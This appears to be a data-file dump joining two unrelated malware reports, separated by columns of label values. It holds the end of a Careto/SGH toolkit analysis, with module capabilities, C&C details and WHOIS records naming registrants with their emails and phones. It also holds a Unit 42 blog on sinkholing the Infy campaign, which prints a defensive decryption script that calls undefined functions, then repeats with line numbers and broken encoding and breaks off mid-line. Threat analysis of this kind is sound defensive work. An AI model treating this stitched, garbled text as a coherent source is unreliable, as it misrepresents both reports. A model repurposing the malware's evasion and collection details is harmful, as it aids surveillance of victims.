v) Cipher module Provides cryptographic functions for other modules. Exported functions: 0x10 Encrypt data with AES-128 0x11 Encrypt data with AES-128 0x12 Encrypt data with RC4 0x13 Encrypt data with RC4 vi) Cmprss module Provides compression functions for other modules. Exported functions: 0x1A Compress data with LZNT1 using the system RtlCompressBuffer function. 0x1B Decompress data with LZNT1 using the system RtlDecompressBuffer function. vii) LoadDll module Registers handler function for process-creation and image-load events. The module reads the list of DLL loading rules from the configuration block and checks them when a new process is created or a module is loaded. These rules specify the location of the DLL to be injected and the list of target process names to inject. An example list of rules follows. DLL: System32\\vchw9x.dll targets: IEXPLORE.EXE:FIREFOX.EXE:MOZILLA.EXE:OPERA.EXE:NETSCAPE.EXE:EMULE.E XE:CHROME.EXE DLL: none targets: @1:*SVCHOST.EXE DLL: System32\\awcodc32.dll targets: EXPLORER.EXE DLL: System32\\SkypeIE6Plugin.dll targets: SKYPE.EXE DLL: System32\\nmwcdlog.dll targets: PCSUITE.EXE:NOKIAOVISUITE.EXE DLL: System32\\awview32.dll targets: OUTLOOK.EXE Exported functions: 0x05 Update the list of DLL loading rules in the configuration block 55 TLP: GREEN viii) PGPsdkDriver module This module is a kernel mode keylogger. It accesses the \xe2\x80\x9c\\Driver\\Kbdclass\xe2\x80\x9d object and intercepts the IRP_MJ_READ and IRP_MJ_PNP request handlers. On IRP_MJ_READ requests, it reports information about pressed keys as custom activity records named \xe2\x80\x9cKEYS\xe2\x80\x9d ix) Fileflt module Intercepts file operations and collects information and their content if they match the filtration rules. Maintains the file activity log file: \xe2\x80\x9c\\SystemRoot\\System32\\c_50225.nls\xe2\x80\x9d Sample filtration rules follow: File mask: \\ *.PAB;*.WAB File mask: \\ *.WRD File mask: \\ *.SKR;*.PKR;*.PGP;*.GPG;*.KEY;*.PPK;*.RDP;*.ASC File mask: \\ *.DOC;*.XLS;*.RTF File mask: \\ *.PDF File mask: \\ *.DOCX;*.XLSX;*.WPS;*.ODT;*.WPD File mask: \\ *.GMG File mask: \\ *.AXX;*.CFE;*.CFD;*.AKF File mask: \\ *.ENC;*.MLS;*.HSE;*.P7M;*.P7C;*.P7Z File mask: \\ *.OCFS;*.M2O;*.M2R;M2F;*.M15;*.OCU File mask: \\ *.VSD;*.OVPN;*.SSH;*.CRT File mask: \\ *.SXW;*.SDW;*.PSW;*.ODS;*.SXC;*.SDC;*.PXL File mask: \\ *.MDDATA File mask: \\ *.EML File mask: *\\WINNT\\ *.* File mask: *\\WINDOWS\\ *.* File mask: *\\PROGRAM FILES\\ *.DOC;*.XLS;*.PDF;*.RTF File mask: *\\PROGRAM FILES\\ *.DOCX;*.XLSX;*.WPS;*.ODT;*.WPD File mask: *\\PROGRAM FILES\\ *.SXW;*.SDW;*.PSW;*.ODS;*.SXC;*.SDC;*.PXL File mask: *\\HARDDISKVOLUMESHADOWCOPY *.* File mask: *\\ARCHIVOS DE PROGRAMA\\ *.DOC;*.XLS;*.PDF;*.RTF File mask: *\\ARCHIVOS DE PROGRAMA\\ *.DOCX;*.XLSX;*.WPS;*.ODT;*.WPD File mask: *\\ARCHIVOS DE PROGRAMA\\ *.SXW;*.SDW;*.PSW;*.ODS;*.SXC;*.SDC;*.PXL Exported functions: 0x14 Update the file filtration rules 0x1E Append the activity log with a new data record 0x21 Append the activity log with a new data record 56 TLP: GREEN x) Stopsec module Interacts with the driver of Kaspersky products (\xe2\x80\x9cKLIF\xe2\x80\x9d) and tries to make own processes invisible to the anti-virus. Exported functions: 0x1C Try to make the process with given PID invisible to Kaspersky Anti-Virus 0x1D Not implemented, only checks input parameters xi) TdiFlt and TdiFlt2 modules These modules provide facilities for intercepting network traffic. The \xe2\x80\x9cTdiFlt\xe2\x80\x9d driver uses the IPFILTER driver while the \xe2\x80\x9cTdiFlt2\xe2\x80\x9d uses the Windows Filtering Platform API. Exported functions: 0x17 Return a pointer to the instance of the main class that manages the driver Although main components of the SGH package operate in kernel mode, there are several components injected as DLLs in user mode. It is worth noting that we have only discovered a 32-bit version of the driver components while the DLL modules have corresponding 64-bit counterparts. xii) awdcxc32 module This library is injected into the \xe2\x80\x9cEXPLORER.EXE\xe2\x80\x9d prcess by the LoadDLL driver component. File type: PE32/PE32+ DLL File location: %windows%\\System32\\awcodc32.dll Compilation timestamps: 2012.07.03 19:53:02 (GMT), 2012.07.03 19:55:22 (GMT), 2013.03.22 11:55:12 (GMT) File sizes: 22016, 24576, 27136 bytes Exports: 79002822: DllCanUnloadNow 7900282B: DllGetClassObject C e e m ex \xe2\x80\x9c{649B015F-A15F-c56b-494B-550BB6237F51}_631345_221507\xe2\x80\x9d Technical details 57 TLP: GREEN All the functionality is implemented in the DllMain function. Connects to the \xe2\x80\x9cvchw9x\xe2\x80\x9d component using a pipe by name taken from the configuration block (\xe2\x80\x9c\\\\.\\pipe\\{807BF02B-3F5F-4570-970A-8AADBAA55AC1}\xe2\x80\x9d) and communicates with the C&C server using that component. All communication between the component and the server is encrypted using the RC4 encryption algorithm. The encryption key is read from the configuration block and equals to the string \xe2\x80\x9cCaguen1aMar\xe2\x80\x9d in all the configurations we discovered. It also loads additional libraries specified in the configuration, i.e. \xe2\x80\x9cmfcn30\xe2\x80\x9d. The module can execute the following commands provided by the C&C server: 2 Write a new executable file to disk and optionally start it 110 Update the configuration block with new C&C data: URLs, encryption key 113 Update the configuration block with new file filtration rules 120 Write a new DLL file to disk and load it The files received from the C&C server can be saved to the default Windows, Temporary or System directories, or any other location specified in the command. xiii) mfcn30 module This library is loaded by \xe2\x80\x9cawcodc32\xe2\x80\x9d. It provides a framework for extending the malware with additional plugins and sending the results of their data collection routines to the C&C server. File type: PE32/PE32+ DLL File location: %windows%\\System32\\mfcn30.dll Compilation timestamps: 2012.07.03 19:53:03 (GMT), 2012.07.03 19:55:23 (GMT), 2013.03.22 11:55:12 (GMT) File sizes: 15872, 17920 bytes Exports: 77001295: DllCanUnloadNow 7700129E: DllGetClassObject Technical details All the functionality is implemented in the DllMain function. Connects to the \xe2\x80\x9cvchw9x\xe2\x80\x9d component using a pipe name from the configuration block \\\\.\\pipe\\{807BF02B-3F5F-4570-970A-8AADBAA55AC1} for interacting with C&C server. 58 TLP: GREEN The module reads a list of additional plugin DLLs from the configuration block, loads these libraries and then periodically queries them for collected information. The results are sent to the C&C server via the pipe interface provided by \xe2\x80\x9cvchw9x\xe2\x80\x9d. Figure 22: Sample list of additional plugins xiv) vchw9x module This module implements network connectivity features for the SGH components. File type: PE32/PE32+ DLL File location: %windows%\\System32\\vchw9x.dll Compilation timestamps: 2012.07.03 19:53:02 (GMT), 2012.07.03 19:55:21 (GMT), 2013.03.22 11:55:11 (GMT) File sizes: 18432, 20992, 22528 bytes Exports: 78001977: DllCanUnloadNow 78001980: DllGetClassObject Technical details This library is injected by the LoadDLL driver into processes from the following list: IEXPLORE.EXE FIREFOX.EXE MOZILLA.EXE OPERA.EXE NETSCAPE.EXE EMULE.EXE CHROME.EXE All the functionality is implemented in the DllMain function. Creates the pipe: \\\\.\\pipe\\{807BF02B-3F5F-4570-970A-8AADBAA55AC1} and processes commands sent via this pipe by other modules. Once a command is received, it passes the network request to Wininet functions and returns the results to the caller module via the same pipe. 59 TLP: GREEN xv) jpeg1x32 module File type: PE32 DLL File location: %windows%\\System32\\jpeg1x32.dll Compilation timestamps: 2013.04.09 14:15:17 (GMT) File sizes: 31744 bytes Exports: 79002656: fnProcess Technical details All the functionality is implemented in the fnProcess function. The function receives 4 parameters that define the module's behavior. Depending on the parameters, it can: \xe2\x97\x8f Delete the SGH components specified in the configuration block, effectively uninstalling it \xe2\x97\x8f Delete the registry keys corresponding to the components of SGH \xe2\x97\x8f Compile a complete system report, including directory locations, hardware parameters, list of users, processes, installed programs, MAC addresses of network adapters \xe2\x97\x8f Call various functions of the \xe2\x80\x9cawdcxc32\xe2\x80\x9d module xvi) siiw9x module File type: PE32 DLL File location: %windows%\\System32\\siiw9x.dll Compilation timestamps: 2013.03.22 11:55:13 (GMT) File sizes: 15360 bytes Exports: 78002078: DllEnumClass Technical details Main functionality is implemented in the DllMain function. The module waits until a desktop named \xe2\x80\x9cscreen-saver\xe2\x80\x9d appears and when that desktop becomes available it creates another desktop named \xe2\x80\x9cDZ9PADXF\xe2\x80\x9d and launches the default browser application there. This functionality may be useful for stable operation of the \xe2\x80\x9cvchw9x\xe2\x80\x9d module on rarely used computers since that module is activated only in browser processes. The \xe2\x80\x9cDllEnumClass\xe2\x80\x9d function deletes the module or removes its name from the configuration block, depending on the Windows version. 60 TLP: GREEN xvii) SkypeIE6Plugin Intercepts and records audio streams from Skype. We have discovered only a 32-bit version of this plugin so far. File type: PE32 DLL File location: %windows%\\System32\\SkypeIE6Plugin.dll Compilation timestamps: 2011.01.17 14:30:23 (GMT) File sizes: 73728 bytes Technical details The library has no exports, its functionality is implemented in the DllMain function. The library hides itself by modifying the list of loaded DLL files to that its own module name appears to be \xe2\x80\x9c%windows%\\System32\\authz.dll\xe2\x80\x9d. It intercepts several functions exported by system libraries to capture sound from the infected system: kernel32.dll CreateFileW dsound.dll DirectSoundCreate, DirectSoundCreate ole32.dll CoCreateInstance winmm.dll waveInOpen, waveInClose, waveOutOpen, waveOutClose The module uses an additional library, \xe2\x80\x9c%windows%\\System32\\lame_enc.dll\xe2\x80\x9d to compress recorded audio data. The location of recorded data is specified in the configuration block. xviii) nmwcdlog module Gathers information from Nokia mobile devices using the Nokia OVI/PC Suite API. File type: PE32 DLL File location: %windows%\\System32\\nmwcdlog.dll Compilation timestamps: 2011.04.26 15:07:26 (GMT) File sizes: 106496 bytes C e e even o jec \xe2\x80\x9cGlo l\\9D14093C-8B2C-49aa-A328-35C1BDB2BC15\xe2\x80\x9d, \xe2\x80\x9cGlo l\\8427ACED-9495-4cb7-A13D-B98012DF6654\xe2\x80\x9d. Technical details The library has no exports, its functionality is implemented in the DllMain function. It loads the Nokia Connectivity API libraries \xe2\x80\x9cConnAPI.dll\xe2\x80\x9d, \xe2\x80\x9cDAAPI.dll\xe2\x80\x9d and tries to extract data from all available devices. 61 TLP: GREEN The module collects the following information: - device name - manufacturer name - model - serial number - list of contacts - calendar - bookmarks - SMS and MMS messages xix) d3dx8_20 module This data collection plugin makes screenshots of the victim's desktop. File type: PE32/PE32+ DLL File location: %windows%\\System32\\d3dx8_20.dll Compilation timestamps: 2011.03.25 10:49:57 (GMT), 2011.03.29 13:40:06 (GMT) File sizes: 130560, 145920 bytes. Technical details The library has no exports, its functionality is implemented in the DllMain function. It makes screenshots of the desktop and marks the position of the mouse cursor. Additionally, it captures the title of the foreground window. Collected data is stored in multi-volume ZIP archives and then delivered to the C&C server. xx) WifiScan module Retrieves the list of available Wi-Fi networks. We have discovered only a 64-bit version of this plugin so far. File type: PE32+ DLL File location: %windows%\\System32\\WifiScan.dll Compilation timestamps: 2011.03.23 08:04:43 (GMT) File sizes: 62464 bytes. Technical details The library has no exports, its functionality is implemented in the DllMain function. It uses the API provided by the library \xe2\x80\x9cwlanapi.dll\xe2\x80\x9d to retrieve information about the wireless networks visible to the infected machine's Wi-Fi interfaces. 62 TLP: GREEN xxi) awview32 module This module is injected in Microsoft Outlook processes. Collects victim's email messages. File type: PE32/PE32+ DLL File location: %windows%\\System32\\awview32.dll Compilation timestamps: 2011.06.10 12:27:40 (GMT), 2011.06.10 16:46:57 (GMT) File sizes: 26624, 45056 bytes. Technical details The library has no exports, its functionality is implemented in the DllMain function. The module implements the Microsoft Outlook add-in interface and ensures it is requested by hooking the OLE2 API. It receives events from the Outlook application, collects the e-mail messages and writes them to the temporary directory. xxii) CDllUninstall module File type: PE32/PE32+ DLL File location: non, is executed in memory Compilation timestamps: 2013.06.20 11:58:03 (GMT), 2013.06.20 11:58:08 (GMT) File sizes: 11264, 13824 bytes Technical details Having its filename related to the SGH package, this module is actually a command package for Careto. It is transmitted by the C&C servers as a CAB archive containing 32-bit and 64-bit versions of its DLL and the accompanying \xe2\x80\x9cMeta.inf\xe2\x80\x9d file. The contents of the archive follow: Name File Size Date Time Meta.inf 548 bytes 28.10.2013 17:20:12 CDllUninstallSGH64.dll CDllUninstallSGH32.dll 13824 bytes 11264 bytes 28.10.2013 17:20:12 28.10.2013 17:20:12 The \xe2\x80\x9cMeta.inf\xe2\x80\x9d instructs the Careto instance to load the DLL appropriate for the system architecture: #Mon Oct 28 17:20:14 GMT 2013 DLL32_FILE_NAME=CDllUninstallSGH32.dll DLL64_FILE_NAME=CDllUninstallSGH64.dll DATE_GENERATION=20131028T172014.101 TYPE=CMD CLIENT_ID=%client id% CMD_SEQ=0002 INST_ID=%installation id% SUB_TYPE=CANNEDDLL TARGET_PROCESS=EXPLORER PRODUCT_CODE=C316 63 TLP: GREEN The module uninstalls both Careto and SGH from the infected computer. Its internal name is \xe2\x80\x9cCDllUninstall v1.0.0"". It explicitly names the software packages with their original names by writing the following strings in the uninstallation log: 1. Unistalling SGH ... 2. Unistalling Careto The module contains hardcoded locations of the files that are removed and registry keys to be removed or restored. For SGH, these are: HKLM\\SYSTEM\\*ControlSet*\\Services\\scsimap %systemroot%\\System32\\bootfont.bin c:\\Windows\\System32\\bootfont.bin %systemroot%\\System32\\drivers\\scsimap.sys c:\\Windows\\System32\\drivers\\scsimap.sys For Careto, it first determines the location of the main module by reading the registry value from: HKLM/HKCU\\SOFTWARE\\CLASSES\\CLSID\\{ECD4FC4D-521C-11D0-B792- 00A0C90312E1} The main module is removed and the original registry value is restored from the registry key: SOFTWARE\\CLASSES\\CLSID\\{E6BB64BE-0618-4353-9193- 0AFE606D6F0C}\\InprocServer32 64 TLP: GREEN APPENDIX 3: C&C registration information Most of the Careto C&C hosts were registered through the free service DYN.COM. Some of the domains however are stand-alone .COM and .NET registration. The registration data is partly visible in a few cases: Domain Name: APPLEUPDT[dot]COM Registrar WHOIS Server: whois.publicdomainregistry.com Registrar URL: www.publicdomainregistry.com Updated Date: Creation Date: 25-Feb-2009 Registrar Registration Expiration Date: 25-Feb-2019 Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registrar IANA ID: 303 Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com Registrar Abuse Contact Phone: +1-2013775952 Domain Status: OK Registry Registrant ID: DI_9419517 Registrant Name: Victoria Gomez Registrant Organization: N/A Registrant Street: CL Esmeralda No 1332 Registrant City: Buenos Aires Registrant State/Province: Buenos Aires Registrant Postal Code: C1007A Registrant Country: AR Registrant Phone: +541.141311903 Registrant Email: victoriag150@googlemail.com Domain Name: MSUPDT[dot]COM Registry Domain ID: 1080338848_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.publicdomainregistry.com Registrar URL: www.publicdomainregistry.com Updated Date: 18-Jun-2013 Creation Date: 11-Jul-2007 Registrar Registration Expiration Date: 11-Jul-2017 Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registrar IANA ID: 303 Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com Registrar Abuse Contact Phone: +1-2013775952 Domain Status: clientTransferProhibited Registry Registrant ID: DI_6819375 Registrant Name: Anne Rasmussen Registrant Organization: msupdt.com Registrant Street: Storgatan 21 Registrant City: Goteborg Registrant State/Province: Registrant Postal Code: 41296 https://reversewhois.domaintools.com/?email=b753ee475870c3e09055ead90c044880 https://reversewhois.domaintools.com/?email=c3c6c3bb94c5ba815d25041eb9f90560 https://reversewhois.domaintools.com/?email=b753ee475870c3e09055ead90c044880 65 TLP: GREEN Registrant Country: SE Registrant Phone: +46.318831056 Registrant Phone Ext: Registrant Fax: +46.318831056 Registrant Email: anne30@vfemail.net Registry Admin ID: DI_6819375 Domain Name: linkconf[dot]net Registry Domain ID: 1710052877_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.gandi.net Registrar URL: http://www.gandi.net Updated Date: 2013-10-23T18:46:03Z Creation Date: 2012-03-30T12:12:52Z Registrar Registration Expiration Date: 2017-03-30T12:12:52Z Registrar: GANDI SAS Registrar IANA ID: 81 Registrar Abuse Contact Email: abuse@support.gandi.net Registrar Abuse Contact Phone: +33.170377661 Domain Status: clientTransferProhibited Registry Registrant ID: Registrant Name: JOAQUIM COSTA Registrant Organization: Registrant Street: Rua do Carmo 26 Registrant City: Braga Registrant State/Province: Registrant Postal Code: 4700-309 Registrant Country: PT Registrant Phone: +351.253204804 Registrant Email: 531becdfa3836a9be267950583190dbc- 1471114@contact.gandi.net https://reversewhois.domaintools.com/?email=99ec5b74165233d5e49e48eda905d55b https://reversewhois.domaintools.com/?email=5349ebc5d0f514a93f68574c1a646458 https://reversewhois.domaintools.com/?email=0c9462fab2e55438f1a5446cea297f67 https://reversewhois.domaintools.com/?email=0c9462fab2e55438f1a5446cea297f67","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Prince of Persia \xe2\x80\x93 Game Over Menu Tools Playbooks Speaking Events About Us Prince of Persia \xe2\x80\x93 Game Over 9,758 people reacted 0 7 min. read Share By Tomer Bar, Lior Efraim and Simon Conant June 28, 2016 at 3:00 PM Category: Malware, Threat Prevention, Unit 42 Tags: C2, Infy Summary Unit 42 published a blog at the beginning of May titled \xe2\x80\x9cPrince of Persia,\xe2\x80\x9d in which we described the discovery of a decade-long campaign using a formerly unknown malware family, Infy, that targeted government and industry interests worldwide. Subsequent to the publishing of this article, through cooperation with the parties responsible for the C2 domains, Unit 42 researchers successfully gained control of multiple C2 domains. This disabled the attacker\xe2\x80\x99s access to their victims in this campaign, provided further insight into the targets currently victimized in this operation, and enabled the notification of affected parties. Post Publication In the week following the publication of the original blog, we observed no unusual changes to the C2 infrastructure. Existing domains did move to new IP addresses, as we had previously seen periodically. Some new install domains were added, adhering to naming conventions of current domains (see appendix for new IOCs). The attackers developed a new version (31), and we observed this deployed against a single Canadian target. The file descriptions remained essentially the same (\xe2\x80\x9cCLMediaLibrary Dynamic Link Library V3\xe2\x80\x9d). Most importantly, there was no change to the encoding key (now using offset 20, and offset 11 for second pass against URL encoding) that we had observed being used for the entire decade-long campaign, and documented in our previous blog. From this we conclude that the attackers were unaware of our initial report. Sinkhole Through cooperation with the parties responsible for the C2 domains, we took control of all but one of them, transferring the A records to a server we controlled. This prevented the attackers from being able to subsequently make any further changes to the domain configurations, issue commands to victims, or capture any further data for the majority of victims. An analysis of connections after transfer suggests that the attackers may have used a third-party service to try to understand why they had suddenly lost almost all of their traffic. Figure 1 shows that tool, a geographic representation of victim-C2 traffic, with all but one at that time now communicating with our sinkhole server. Figure 1 Graphical representation of victim traffic to C2 We have since transferred sinkhole control to Shadowserver, whom we thank for subsequent victim notification & remediation (https://www.shadowserver.org/wiki/pmwiki.php/Involve/GetReportsOnYourNetwork). Victims We were able to analyze victim C2 traffic to understand who were victims of the Infy campaign. We identified 456 malware agents installed on 326 victim systems, in 35 countries. Figure 2 shows a geographical breakdown of victim locations. We noted in our original blog the large amount of targeting of Iranian citizens in this campaign, we observed almost one-third of all victims to be Iranian. Also of note was the low overall volume of victims, compared to, for example, crimeware campaigns. Figure 2 Geographic location of victims. Please note that New Zealand has been omitted from this map only because we observed no victim activity there. Versions In our original blog, we noted two distinct primary variants of the Infy malware. In addition to the original \xe2\x80\x9cInfy\xe2\x80\x9d variant, we also see the newer, more sophisticated, interactive, and fuller-featured \xe2\x80\x9cInfy M\xe2\x80\x9d variant deployed against apparently-higher-value targets. Overall, 93% of all victims were infected with Infy, and 60% with Infy \xe2\x80\x9cM\xe2\x80\x9d (Figure 3). Combined with the low total number of victims, this suggests a great deal of care given to each individual campaign target. The large number of victims with both variants may relate to their complimentary feature set, or represent an \xe2\x80\x9cupgrade\xe2\x80\x9d path on victims from the original variant infection, later adding the \xe2\x80\x9cM\xe2\x80\x9d variant as targets appeared more compelling to the attackers. Figure 3 Breakdown of Infy vs. Infy \xe2\x80\x9cM\xe2\x80\x9d infections For the Infy \xe2\x80\x9cM\xe2\x80\x9d variant, we note that the majority of targets are using the latest version (7.8), and that none are using the older 6.x versions at all (Figure 4). This suggests that these higher-value targets are paid much more attention, being kept up-to-date with the latest version. In contrast, for the more basic original Infy variant, we note a full spectrum of versions installed (Figure 5), with many victims on older versions \xe2\x80\x93 including the original, decade-old V1 \xe2\x80\x93 suggesting much less concern is paid to these individual targets (note that we did observe a small number of the older 6.x versions but these do not announce their version when connecting). Figure 4 Infy \xe2\x80\x9cM\xe2\x80\x9d Victim versions Figure 5 Infy\xe2\x80\x9dOriginal\xe2\x80\x9d Victim versions Game Over Shortly after the takedown, as well as a new Infy version (31), we also observed the registration of multiple domains using a previously-seen pattern, against known campaign IP addresses. Almost every domain in the pattern-range box4035[.]net \xe2\x80\x93 box4090[.]net (138.201.0.134). These were not observed in any sample C2 lists however. Bestwebstat[.]com was sinkholed by another operator. Some victims infected with Infy versions 15-24 still used the C2 server us1s2[.]strangled[.]net, which remained in the hands of the attacker. In early June the attackers used this C2 to issue instructions to download new Infy \xe2\x80\x9cM\xe2\x80\x9d version 8.0 from us1s2[.]strangled[.]net/bdc.tmp. This was the first time we had observed an Infy variant being directly updated to Infy \xe2\x80\x9cM\xe2\x80\x9d. This used camouflage name \xe2\x80\x9cMacromedia v4\xe2\x80\x9d, changed from \xe2\x80\x9cv3\xe2\x80\x9d seen in Infy v31. They also removed the voice recording capability in this version. uvps1[.]cotbm[.]com was used for data exfiltration, previously at 138.201.47.150, after publishing of our original blog moving to 144.76.250.205. It was also hosting malware updates at /themes/u.php. They also added a curious C2 entry \xe2\x80\x9chxxp://box\xe2\x80\x9d (note: defanged for publishing). It\xe2\x80\x99s unclear how this should function; possibly a compromised victim intranet device, or the attackers have modified the HOSTS file on the victim computer. After the take-down, the attackers began to add server IP addresses as well as domain names to their malware C2 list. They also slightly modified their ZIP password from \xe2\x80\x9cZ8(2000_2001ul\xe2\x80\x9d to \xe2\x80\x9cZ8(2000_2001uIEr3\xe2\x80\x9d. Their new malware version added antivirus checks for Kaspersky Labs, Avast, and Trend Micro. The malware data capture now searches for file extensions: .doc, .docx, .xls, .xlsx, .xlr, .pps, .ppt, .pptx, .mdb, .accdb, .db, .dbf, .sql, .jpg, .jpeg, .psd, .tif, .mp4, .3gp, .txt, .rtf, .odt, .htm, .html, .pdf, .wps, .contact, .csv, .nbu, .vcf, .pst, .zip, .rar, .7z, .zipx, .pgp, .tc, .vhd, .p12, .crt.pem,.key.pfx, .asc, .cer, .p7b, .sst, .doc, .docx, .xls, .xlsx, .xlr, .pps, .ppt, .pptx. and folder locations: :\\$recycle.bin, :\\documents and settings, :\\msocache, :\\program files, :\\program files (x86), :\\programdata, :\\recovery, :\\system volume sers, :\\windows, :\\boot, :\\inetpub, :\\i386. The malware continued to use the identical decryption key seen over the entire history of this campaign. Mid-June, through cooperation with the parties responsible for the C2 domains and law enforcement, we were able to get the remaining C2 domains null-routed and the directly-IP-addressed server disabled. This is the end of a decade-long campaign, though we naturally expect to see this actor back in some other guise before long. Thanks to the Malware research team \xe2\x80\x93 Yaron Samuel, Artiom Radune, Mashav Sapir, Netanel Rimer \xe2\x80\x93 for assistance in the takedown. Appendix 1 \xe2\x80\x93 Exfiltration Algorithm The malware uses a different algorithm than that used for encrypting the malware strings to encrypt the exfiltration data, including: Keylogger data + language. Malware logs \xe2\x80\x93 installation time, DLL path and name, log path, number of downloads, number of successful/failed connections. Information about the victim computer: Time zone, list of drives and types, running processes, disk info. First the malware adds 1 to all bytes, then an encryption key is initialized based on the victim computer name (the offset in the key is calculated by sum of the computer name letters %key length). Then the key is used to encrypt the data (see decrypt function). The encrypted data is then base64 encoded. Exfiltration data decryption python code: import os,sys import string import base64 import fileinput FIRST_PHASE = ""OQTJEqtsK0AUB9YXMwr8idozF7VWRPpnhNCHI6Dlkaubyxf5423jvcZ1LSGmge"" SECOND_PHASE = ""PqOwI1eUrYtT2yR3p4E5o6WiQu7ASlDkFj8GhHaJ9sKdLfMgNzBx0ZcXvCmVnb"" global FULL_KEY FULL_KEY= """" def sub_1_for_hex(str_input): str_output = """" for letter in str_input: try: str_output += chr(ord(letter)-1) except: print ""sub_1_for_hex func problem"" continue return str_output def sum_comp_name(comp_name): sum = 0 for letter in comp_name: sum+= ord(letter) return sum def init_key(comp): comp_name_sum = sum_comp_name(comp) carry = divmod(comp_name_sum, 62) index = carry[1] -1 end_key = FIRST_PHASE[:index] key = FIRST_PHASE[index:] key = key + end_key key = key + key return key def decrypt(num_list,offset): global FULL_KEY input = """" for num_str in num_list: try: input += num_str.decode('hex') except: input += ')' result = """" for i, c in enumerate(input): i = i % 62 +1 try: index = FULL_KEY.index(c)-1 except ValueError: result += c continue translated = SECOND_PHASE[(index - i +offset) % len(SECOND_PHASE)] result += translated return result def found_infy_enc_data(line): found_infy_str = ""show=\\""---------- Administration Reporting Service "" found_infy_index = line.find(found_infy_str) if not found_infy_index==-1: return True,found_infy_index else: return False,found_infy_index def extract_comp_name(line): comp = r""\\xd\\xa-----"" comp_index = line.find(comp) comp_name = line[comp_index+len(comp):] comp_name = comp_name[:comp_name.find(""-----"")] print ""(((=)))"" + comp_name return comp_name def extract_enc_data(line): header = r""\\xd\\xa_____"" start_index = line.find(header)+len(header) line = line[start_index:] endindex = line.index(""_____\\"" value="") line = line[:endindex] return line def write_enc_infy_data_to_file(dec_line,comp_name,filename): file1 = open(filename + ""\\\\"" + comp_name + "".txt"",'ab') file1.writelines(dec_line) file1.close() def enc_wrapper(enc,comp_name): global FULL_KEY print FULL_KEY FULL_KEY = init_key(comp_name) enc_final = """" for letter in enc: if len(hex(ord(letter))[2:])==1: enc_final += ""0"" + hex(ord(letter))[2:] elif len(hex(ord(letter))[2:])==2: enc_final += hex(ord(letter))[2:] else: print ""not good hex length"" exit() enc = enc_final.upper() enc = enc.replace(""2E"",""21"") enc = enc.replace(""C5DC5A"","""") enc = enc.replace(""D03D00"","""") enc = enc.replace(""0B0E"",""2121"") enc = enc.replace(""01"",""21"") enc_len = len(enc) enc_rev = """" num_list = [] enc_print ="""" for i in range(0,enc_len/2): enc_rev = enc[-2:] if not enc_rev==""0B"" and not enc_rev==""0E"" and not enc_rev==""00"" and not enc_rev==""D0"": enc_print +=enc_rev num_list.append(enc_rev) enc= enc[:-2] #the first part is always ok dec_str = decrypt(num_list,0) final = sub_1_for_hex(dec_str) index = final.find(""OK: Sent"") if index==-1: print comp_name + "" - did not found OK: Sent !!!!\\n\\n\\n\\n"" #exit() decrypt_data = comp_name + "" ++==++ "" + str(i) + "": "" + final + ""\\n"" final_start = final[0:500] if final_start in UNIQUE_DATA: print comp_name + "" already have this data"" return UNIQUE_DATA.append(final_start) index = final.find(""Installed Date:"") if index==-1: for i in range(1,61): dec_str = decrypt3(num_list,i) final = sub_1_for_hex(dec_str) ##print all 62 options index2 = final.find(""PROGRAM START:"") index3 = final.find(""Installed Date:"") if not index2 ==-1 or not index3 ==-1: decrypt_data += str(i) + "": "" + final + ""\\n"" write_enc_infy_data_to_file(decrypt_data,comp_name,FILE_OUTPUT_NAME) def read_enc_data_files(): for root,dir,files in os.walk(PDML_PATH): for file in files: filename = root+ ""\\\\"" + file if os.path.isfile(filename): print filename for line in fileinput.input([filename]): line = line.strip() is_found,found_infy_index= found_infy_enc_data(line) if not is_found: continue line = line[found_infy_index:] #get computer name (for use in init_key() later) comp_name = extract_comp_name(line) UNIQUE_COMP.append(comp_name) #get the infy encrypted data line = extract_enc_data(line) #base64 decode enc_data dec_line = line.decode('base64') #append enc_data to file write_enc_infy_data_to_file(dec_line,comp_name,FILE_ENC_OUTPUT_NAME) enc_wrapper(dec_line,comp_name) try: read_enc_data_files() except: print ""exception!!!!"" 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 import os,sys import string import base64 import fileinput FIRST_PHASE = ""OQTJEqtsK0AUB9YXMwr8idozF7VWRPpnhNCHI6Dlkaubyxf5423jvcZ1LSGmge"" SECOND_PHASE = ""PqOwI1eUrYtT2yR3p4E5o6WiQu7ASlDkFj8GhHaJ9sKdLfMgNzBx0ZcXvCmVnb"" global FULL_KEY FULL_KEY= """" def sub_1_for_hex(str_input): \xc2 \xc2 \xc2 \xc2 str_output = """" \xc2 \xc2 \xc2 \xc2 for letter in str_input: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 try: \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 str_output += 